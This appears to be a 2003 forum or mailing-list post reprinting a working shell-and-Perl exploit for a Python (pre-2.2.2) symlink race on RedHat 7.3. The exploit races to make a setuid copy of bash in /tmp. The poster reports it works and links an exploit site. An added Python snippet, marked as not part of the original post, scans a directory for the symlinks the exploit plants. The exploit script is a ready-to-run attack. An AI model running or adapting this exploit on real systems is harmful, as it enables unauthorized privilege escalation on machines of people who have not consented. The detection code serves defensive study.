Not to beat a dead horse, but the exploit code is published at:
http://www.ad2u.gr/index.php?topic=Exploits

It does work on my (unpatched vmware) RedHat 7.3. Although (as the notice stated), it creates a suidshell as the user who runs the script, not root. It also needs to be modified to use python2 on RedHat.

Here's the code:

#!/bin/sh
echo "Python < 2.2.2 Symlink Race Condition exploit"
echo "Access-=-Denied Networks (c) mzozd@ad2u.gr, 2003"
echo "This is a proof of concept code!!! For educational purposes only"
evilcmd="#!/bin/sh\ncp /bin/bash /tmp/.sh\nchmod 4755 /tmp/.sh\n"
status="??"
echo "Creating suidshell script"
echo -e $evilcmd > /tmp/runme.sh
chmod 755 /tmp/runme.sh
perl -e 'while (1) { open ps,"ps -ef | grep -v grep | grep -v PID |"; while (<ps>) {@args = split " ", $_;if (/python/) {$args[2] = "@"; symlink("/tmp/runme.sh","/tmp/$args[2]$args[1].0");}}}'&
echo "Building python file..."
echo -e "import os\nos.execvpe('echo',['echo','-n','.'],os.environ)" > /tmp/python.py
echo "Be patient, it will take a few moments"
while [ "$status" != "ok" ]
do
    python /tmp/python.py
    if test -e /tmp/.sh; then
        status="ok"
    fi
done
echo -e "\nYou got your suidshell..."
ls -al /tmp/.sh
echo "Cleaning environment"
killall -9 perl
rm -rf /tmp/runme.sh /tmp/*.0 /tmp/python.py
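
A defender-side check for the artifact the script above leaves behind, as an added example that is not part of the original post: it lists symlinks named @<pid>.0 in a directory, which is the name the posted script plants in /tmp. The function names, result fields and sample directory are constructed for illustration.

```python
import os
import re
import stat
import tempfile

# Name pattern taken from the script in the post: /tmp/@<pid>.0
PLANTED_NAME = re.compile(r"^@(\d+)\.0$")


def find_planted_symlinks(directory="/tmp"):
    """Return one finding per symlink in `directory` named @<pid>.0."""
    findings = []
    for name in sorted(os.listdir(directory)):
        match = PLANTED_NAME.match(name)
        if not match:
            continue
        path = os.path.join(directory, name)
        try:
            info = os.lstat(path)  # lstat inspects the link, never follows it
            if not stat.S_ISLNK(info.st_mode):
                continue  # a regular file with this name is not the artifact
            target = os.readlink(path)
        except OSError:
            continue  # entry vanished or changed between the calls
        findings.append({
            "path": path,
            "pid": int(match.group(1)),
            "target": target,
            "link_owner_uid": info.st_uid,
        })
    return findings


def demo():
    """Scan a constructed sample directory (hypothetical contents)."""
    with tempfile.TemporaryDirectory() as sample:
        script = os.path.join(sample, "runme.sh")
        with open(script, "w") as handle:
            handle.write("#!/bin/sh\n")
        os.symlink(script, os.path.join(sample, "@4242.0"))    # flagged
        open(os.path.join(sample, "@4243.0"), "w").close()     # regular file
        os.symlink(script, os.path.join(sample, "notes.lnk"))  # other name
        return find_planted_symlinks(sample)


if __name__ == "__main__":
    for finding in demo():
        print(finding)
```

Comparing link_owner_uid with the owner of the process whose PID appears in the name shows whether a different user created the link.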